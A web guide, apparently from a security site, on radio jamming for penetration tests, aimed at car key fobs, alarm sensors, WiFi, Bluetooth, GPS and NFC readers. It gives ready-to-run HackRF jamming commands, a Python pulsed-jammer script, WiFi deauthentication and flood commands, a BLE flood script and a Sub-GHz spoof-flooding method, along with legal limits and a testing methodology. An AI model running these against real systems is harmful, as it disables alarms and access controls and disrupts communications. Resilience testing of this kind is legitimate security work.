Jamming Signals/Frequencies (Guide) | Black Hat HQ


Signal jamming in a pentest is about testing system resilience: what happens when wireless communication fails. This guide covers jamming signals and frequencies for that purpose.


The Hardware Toolchain


What You Already Have (Flipper Zero)


The Flipper's CC1101 Sub-GHz radio can transmit a continuous wave at 300-348 MHz, 387-464 MHz, and 779-928 MHz (Unleashed firmware removes the TX lock). Its BLE module (nRF52832) can flood 2.4 GHz BLE channels. Neither is a dedicated jammer, but both can disrupt specific targets at close range.


What Actually Works for Pentest Jamming


| Device | Range | Frequency Coverage | Power | Best For |
| --- | --- | --- | --- | --- |
| HackRF One | Medium | 1 MHz - 6 GHz (full) | ~15 dBm | Full-spectrum testing, protocol-aware jamming |
| LimeSDR | Medium | 100 kHz - 3.8 GHz | ~10 dBm | Precise, FPGA-accelerated |
| BladeRF | Medium | 47 MHz - 6 GHz | ~8 dBm | Wideband, good filtering |
| CC1101 + 20dBm amp | Long | 300-928 MHz | ~100 mW | Sub-GHz only, cheap, effective |
| nRF24L01 + PA/LNA | Medium | 2.4 GHz | ~20 dBm | WiFi/BLE jamming |
| ESP32 | Short | 2.4 GHz (WiFi/BLE) | ~20 dBm | Deauth attacks, BLE flooding |
| YARD Stick One | Medium | Sub-GHz | ~15 dBm | Dedicated Sub-GHz, good modulation |


For most vehicle and access control pentests, HackRF is the right tool: full frequency range, good power, and massive community tooling.


Frequency Landscape - What You're Jamming


Different targets, different bands:


| Target System | Frequency | Modulation | Jam Type |
| --- | --- | --- | --- |
| Car key fobs (US) | 315 MHz | ASK/OOK | CW or pattern-specific |
| Car key fobs (EU) | 433.92 MHz | ASK/OOK | CW or pattern-specific |
| Car PKE challenge | 125 kHz | LF CW | Magnetic field (different hardware) |
| Alarm panel sensors | 315/433/868 MHz | ASK/OOK, FSK | CW or replay flooding |
| Garage doors | 315/390/433 MHz | ASK/OOK, rolling | Protocol-aware |
| WiFi 2.4 GHz | 2.4-2.4835 GHz | OFDM/DSSS | Deauth, channel flood |
| WiFi 5 GHz | 5.15-5.85 GHz | OFDM | Channel-specific flood |
| Bluetooth/BLE | 2.4-2.4835 GHz | FHSS/GFSK | Channel map flooding |
| GPS L1 | 1575.42 MHz | BPSK | CW sweep (extremely low power only) |
| NFC / HF RFID | 13.56 MHz | ASK, various | Magnetic field disruption |
| Cellular (test lab only) | 700-2600 MHz | Various | Wideband noise (FARADAY CAGE REQUIRED) |
| LoRa / LoRaWAN | 868/915 MHz | Chirp spread | Chirp-specific sweep |


Critical boundary: Jamming cellular, GPS, aviation, emergency services, or public communications is illegal regardless of pentest authorization. GPS jamming within a shielded lab for product testing is the sole exception. For a building pentest, cellular and GPS are off the table unless you own the spectrum or are in a certified Faraday environment.


Technique 1: Continuous Wave (CW) - The Sledgehammer

The simplest jam. Transmit a pure carrier at the target frequency. Any receiver near you is deafened by the signal.


HackRF — CW Jammer


```bash
# Simple continuous wave at 315 MHz
hackrf_transfer -f 315000000 -x 40 -a 1 -t /dev/zero

# Parameters:
# -f: frequency in Hz
# -x 40: TX gain (0-47, 40 is max safe, 47 may overheat)
# -a 1: enable amplifier
# -t /dev/zero: transmit zeros = CW tone

# Swept CW (harder to filter, hits wider targets)
hackrf_transfer -f 315000000 -x 40 -a 1 -s 2000000 -t sweep.iq
# Where sweep.iq is a pre-generated IQ file that sweeps ±100 kHz
```

Flipper Zero — CW via External CC1101


```bash
# Flipper GPIO → external CC1101 with PA/LNA
# Use Unleashed firmware's CC1101 ext app
# Or write custom Sub-GHz RAW that's just carrier

# On Flipper: Sub-GHz → Read → Raw → record 1 second of silence
# Edit the .sub file to extend duration
# This effectively transmits dead carrier at whatever frequency you set
```

Python Automation for HackRF


```python
#!/usr/bin/env python3
"""
Targeted jammer for authorized pentesting.
Jams specific frequency for defined duration.
"""
import subprocess
import time
import sys
import signal
import argparse

def jam(freq_mhz, duration_sec, gain=40):
    """Transmit CW at specified frequency for specified duration"""
    freq_hz = int(freq_mhz * 1_000_000)

    print(f"[+] Jamming {freq_mhz} MHz for {duration_sec} seconds...")

    proc = subprocess.Popen([
        "hackrf_transfer",
        "-f", str(freq_hz),
        "-x", str(gain),
        "-a", "1",          # Amp on
        "-t", "/dev/zero",  # CW
        "-s", "2000000",    # Sample rate
    ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

    try:
        time.sleep(duration_sec)
    except KeyboardInterrupt:
        pass
    finally:
        proc.terminate()
        proc.wait()
        print("[+] Jammer stopped")

def jam_pulse(freq_mhz, on_time, off_time, cycles, gain=40):
    """Pulsed jamming — harder to locate, tests recovery behavior"""
    freq_hz = int(freq_mhz * 1_000_000)

    print(f"[+] Pulsed jamming {freq_mhz} MHz: "
          f"{on_time}s on / {off_time}s off × {cycles}")

    for i in range(cycles):
        print(f"  Pulse {i+1}/{cycles} — JAMMING")
        proc = subprocess.Popen([
            "hackrf_transfer",
            "-f", str(freq_hz),
            "-x", str(gain),
            "-a", "1",
            "-t", "/dev/zero",
            "-s", "2000000",
        ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

        time.sleep(on_time)
        proc.terminate()
        proc.wait()

        if i < cycles - 1:
            print(f"  Pulse {i+1}/{cycles} — quiet")
            time.sleep(off_time)

    print("[+] Pulse sequence complete")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Targeted pentest jammer")
    parser.add_argument("freq", type=float, help="Target frequency in MHz")
    parser.add_argument("-d", "--duration", type=int, default=10,
                        help="Duration in seconds")
    parser.add_argument("-p", "--pulse", action="store_true",
                        help="Pulsed mode")
    parser.add_argument("--on-time", type=float, default=2.0)
    parser.add_argument("--off-time", type=float, default=3.0)
    parser.add_argument("--cycles", type=int, default=5)
    parser.add_argument("-g", "--gain", type=int, default=40)

    args = parser.parse_args()

    signal.signal(signal.SIGINT, lambda s, f: sys.exit(0))

    if args.pulse:
        jam_pulse(args.freq, args.on_time, args.off_time,
                  args.cycles, args.gain)
    else:
        jam(args.freq, args.duration, args.gain)
```

Technique 2: Protocol-Aware Jamming - The Scalpel


CW is loud and obvious. Protocol-aware jamming injects garbage into the actual protocol, disrupting communication while looking like noise to spectrum analyzers.


Sub-GHz — Car Fob / Alarm Sensor Jamming


```bash
# Capture the target's actual signal first (with Flipper or HackRF)
hackrf_transfer -f 315000000 -r target_signal.iq -s 2000000 -n 20000000

# Analyze in Universal Radio Hacker (URH) or inspectcli
# Determine: modulation (ASK/OOK/FSK), bit rate, preamble, sync word

# Generate jamming signal that mimics the protocol
# — Repeating preamble (prevents sync)
# — Random payload (corrupts valid data after sync)
# — Valid structure with invalid data (fools some filters)

# URH can generate these from the captured signal
# Export as IQ file, replay with HackRF:

hackrf_transfer -f 315000000 -t protocol_jam.iq -x 40 -a 1 -R
# -R: repeat the IQ file continuously
```

WiFi Deauthentication (Targeted)


This is protocol-level jamming. Not a raw RF blast — you're sending valid 802.11 management frames.


```bash
# Aireplay-ng — deauth specific client
sudo aireplay-ng -0 0 -a AP_MAC -c CLIENT_MAC wlan0mon
# -0 0: infinite deauth packets

# MDK4 — the dedicated WiFi jammer
sudo mdk4 wlan0mon d -c 1,6,11    # Deauth on channels 1, 6, 11
sudo mdk4 wlan0mon b -c 1 -t AP_MAC  # Beacon flood on channel 1
sudo mdk4 wlan0mon a -a AP_MAC       # Auth flood (DoS AP)
sudo mdk4 wlan0mon p -b 00:11:22:33:44:55  # Probe flood

# ESP32 deauther (dedicated, portable)
# Flash Spacehuhn's ESP8266/ESP32 Deauther firmware
# Battery-powered, fits in pocket
# Web interface to select targets
```

BLE — Advertisement Flooding


```python
#!/usr/bin/env python3
"""BLE advertisement flood — tests BLE resilience"""
from scapy.all import *
# The BTLE layers live in scapy's bluetooth4LE module; the original also
# imported pybluez (`from bluetooth import *`), which is unused here.
from scapy.layers.bluetooth4LE import BTLE, BTLE_ADV, BTLE_ADV_IND

def ble_adv_flood(iface="hci0", count=1000):
    """Flood BLE advertising channels with random advertisements"""
    print(f"[+] BLE flood starting on {iface}")

    for i in range(count):
        # Random MAC, random data
        pkt = BTLE() / BTLE_ADV(RxAdd=0, TxAdd=0) / \
              BTLE_ADV_IND(AdvA=RandMAC(), AdvData=b"\x00" * 31)
        sendp(pkt, iface=iface, verbose=0)
        if i % 100 == 0:
            print(f"  Sent {i} advertisements")

    print(f"[+] Flood complete: {count} advertisements sent")

# For Flipper Zero: Apps → Bluetooth → BLE Spam
# Select target type (iOS, Android, Windows, Tesla)
# Floods BLE advertisements continuously
```

Technique 3: GPS Jamming (Shielded Lab Only)


GPS L1 (1575.42 MHz) is extremely weak at the receiver (~-130 dBm). Even microwatt-level jamming can overwhelm it.


This is ILLEGAL outside a certified Faraday cage. Within a shielded lab testing vehicle telematics or asset trackers:


```bash
# Extremely low power GPS test signal
# ONLY in Faraday-caged environment

# Generate a swept tone across GPS L1 bandwidth (2 MHz wide)
# Using GNU Radio or custom IQ generation
python3 generate_gps_noise.py  # Your IQ file generator

# Transmit at MINIMUM power
hackrf_transfer -f 1575420000 -t gps_noise.iq -x 0 -a 0 -s 2000000

# -x 0: MINIMUM gain
# -a 0: amplifier OFF
# Start with lowest power, increase only if needed
# Verify with spectrum analyzer that signal stays in cage

# The pentest question: "Does the GPS tracker detect loss of signal
# and alert? Or does it silently fail?"
```

Technique 4: NFC / HF RFID Field Disruption


NFC and 13.56 MHz RFID use magnetic near-field coupling. Jamming requires disrupting the reader's magnetic field.


```bash
# This is HARD to do at distance — near-field drops as 1/r³
# Practical only within ~10cm of the reader

# Flipper Zero approach:
# 13.56 MHz → Extra Actions → Emulate Reader
# Flipper continuously polls for cards
# This creates a competing 13.56 MHz field
# Hold Flipper against the target reader
# The reader's field and Flipper's field interfere
# Tags can't communicate with either

# Dedicated approach: Proxmark3
# In the pm3 client:
hf 14a reader
# Continuous polling disrupts nearby ISO 14443 readers

# This tests: does the door fail open or fail closed?
# Does security detect the reader being disrupted?
```

Technique 5: Sub-GHz Spoof-Jamming Hybrid


The most effective Sub-GHz attack isn't pure jamming — it's flooding with valid-looking but wrong data.


```bash
# 1. Capture the target's sensor/key fob signal
hackrf_transfer -f 433920000 -r capture.iq -s 2000000 -n 10000000

# 2. Extract the protocol in URH
# Identify: preamble, sync word, payload structure, CRC

# 3. Generate hundreds of variants:
# - Valid preamble + random payload
# - Valid preamble + valid structure + random values
# - Valid structure + invalid CRC (consumes receiver processing time)

# 4. Replay at high speed
hackrf_transfer -f 433920000 -t spoof_flood.iq -x 40 -a 1 -R

# The receiver spends all its time trying to decode garbage.
# Legitimate signals are lost in the noise.
```

Pentest Methodology - What You're Actually Testing


Jamming isn't a standalone attack. You're testing resilience:


1. Fail-Safe vs Fail-Secure


```text
[Alarm sensor jammed]   → Does it alert "sensor offline" or stay silent?
[Door controller jammed] → Does it lock, unlock, or maintain state?
[GPS jammed]             → Does tracker alert, or report last known position silently?
[WiFi deauthed]          → Does the security system fall back to wired? Cellular?
```

2. Detection Testing


```text
[Start jamming] → How long until SOC/SIEM detects signal loss?
[Stop jamming]  → Does the system auto-recover? How long?
[Pulse jamming] → Does intermittent disruption trigger alerts or get averaged out?
```

3. Fallback Testing


```text
[WiFi down]     → Does the alarm panel fall back to cellular? Ethernet?
[Sub-GHz down]  → Do sensors have alternate paths? Wired zones?
[BLE down]      → Does the phone key fall back to NFC? Keypad?
[GPS down]      → Does navigation fall back to dead reckoning? INS?
```

Engagement Workflow


```bash
# ===== PRE-ENGAGEMENT =====
# 1. Document: every frequency you'll transmit on
# 2. Document: max power level, duration, location
# 3. Confirm: Faraday cage for any GPS/cellular testing
# 4. Confirm: no adjacent medical/life-safety wireless systems
# 5. Have: spectrum analyzer ready to verify emissions stay in scope

# ===== TESTING =====
# 6. Start with minimum power, increase only as needed
# 7. Jam for minimum duration to observe effect
# 8. Allow full recovery between tests
# 9. Monitor with spectrum analyzer throughout

# ===== DOCUMENTATION =====
# 10. For each test: frequency, power, duration, observed effect
# 11. Time from jam start to detection (by blue team)
# 12. Time from jam stop to full recovery
# 13. CVSS for each finding
```

The Safety Boundaries


These are hard lines. Crossing them is illegal regardless of pentest authorization:


| Don't | Why |
| --- | --- |
| Jam cellular bands (700-2600 MHz in US) | Blocks 911 calls. Federal crime. FCC hunts aggressively. |
| Jam GPS outside a Faraday cage | Aircraft, maritime, emergency services. Severe federal crime. |
| Jam aviation bands (108-137 MHz) | Air traffic control. Life safety. |
| Jam marine VHF (156-162 MHz) | Distress channels. Coast Guard responds. |
| Jam emergency services | Police/fire/ambulance radio. Obvious. |
| Jam in hospitals | Medical telemetry, pacemaker programmers. |
| Jam outside your authorized scope | The authorization letter defines the building/floor/time window. Stay in it. |
| Use power amplification without measurement | Know your ERP. A HackRF + 20W amp at 315 MHz will blanket a neighborhood. Don't. |
| Leave the jammer unattended | You must be physically present and able to stop immediately if something goes wrong. |
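"Know your ERP" is a number you can write into the pre-engagement document before keying up. The following is an added example (not from the original guide) that computes EIRP for a transmit chain, estimates the free-space level at the edge of the authorized area, and gates the test on a documented envelope. The chain figures (15 dBm HackRF output, 20 W amplifier, 1 dB cable loss, 2 dBi whip) and the envelope limits are constructed; substitute measured values.

```python
"""Pre-engagement emission budget (added example, not from the guide).

Computes EIRP for a transmit chain and the free-space level expected at the
edge of the authorized area, then gates the test on the envelope documented
in the pre-engagement step. Chain figures and limits below are constructed;
substitute measured values from the spectrum analyzer.
"""
import math

def eirp_dbm(source_dbm, amp_gain_db=0.0, loss_db=0.0, antenna_dbi=0.0):
    """Source power plus amplifier and antenna gain, minus cable/connector loss."""
    return source_dbm + amp_gain_db - loss_db + antenna_dbi

def dbm_to_watts(dbm):
    return 10 ** ((dbm - 30) / 10)

def watts_to_dbm(watts):
    return 10 * math.log10(watts) + 30

def fspl_db(freq_mhz, dist_m):
    """Free-space path loss (Friis), frequency in MHz, distance in metres.
    A lower bound on real-world loss: walls and ground add attenuation."""
    return 20 * math.log10(dist_m) + 20 * math.log10(freq_mhz) - 27.55

def check_budget(chain, freq_mhz, boundary_m, max_eirp_dbm, max_boundary_dbm):
    """Return the budget and whether it fits the documented envelope."""
    eirp = eirp_dbm(**chain)
    at_boundary = eirp - fspl_db(freq_mhz, boundary_m)
    return {
        "eirp_dbm": round(eirp, 1),
        "eirp_w": round(dbm_to_watts(eirp), 3),
        "boundary_dbm": round(at_boundary, 1),
        "ok": eirp <= max_eirp_dbm and at_boundary <= max_boundary_dbm,
    }

# Constructed chains: bare HackRF (~15 dBm out) vs. the same chain driving a
# 20 W amplifier, both with 1 dB of cable loss and a 2 dBi whip antenna.
BARE_HACKRF = {"source_dbm": 15.0, "loss_db": 1.0, "antenna_dbi": 2.0}
WITH_20W_AMP = {"source_dbm": 15.0, "amp_gain_db": watts_to_dbm(20) - 15.0,
                "loss_db": 1.0, "antenna_dbi": 2.0}

# Constructed envelope: 315 MHz, authorized area edge 50 m away, EIRP capped
# at 20 dBm (100 mW) and no more than -30 dBm expected at the fence line.
ENVELOPE = dict(freq_mhz=315.0, boundary_m=50.0,
                max_eirp_dbm=20.0, max_boundary_dbm=-30.0)

if __name__ == "__main__":
    for name, chain in (("bare HackRF", BARE_HACKRF), ("HackRF + 20 W amp", WITH_20W_AMP)):
        print(name, check_budget(chain, **ENVELOPE))
```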


Practical: HackRF Jamming Kit Build


```bash
# Minimum viable pentest jamming kit:
# 1. HackRF One
# 2. Portable power (USB-C battery pack, 20000 mAh)
# 3. Laptop running Kali
# 4. Small spectrum analyzer (TinySA, ~$60 — verifies your emissions)
# 5. Appropriate antennas:
#    - 315/433 MHz telescopic for Sub-GHz
#    - 2.4/5 GHz for WiFi/BLE
#    - GPS patch antenna (shielded lab only)

# Verify emissions before testing:
# 1. Set up HackRF at test frequency
# 2. Walk perimeter with TinySA in max-hold mode
# 3. Confirm signal is contained to authorized test area
# 4. Document the emission envelope
```

© 2026 Black Hat HQ
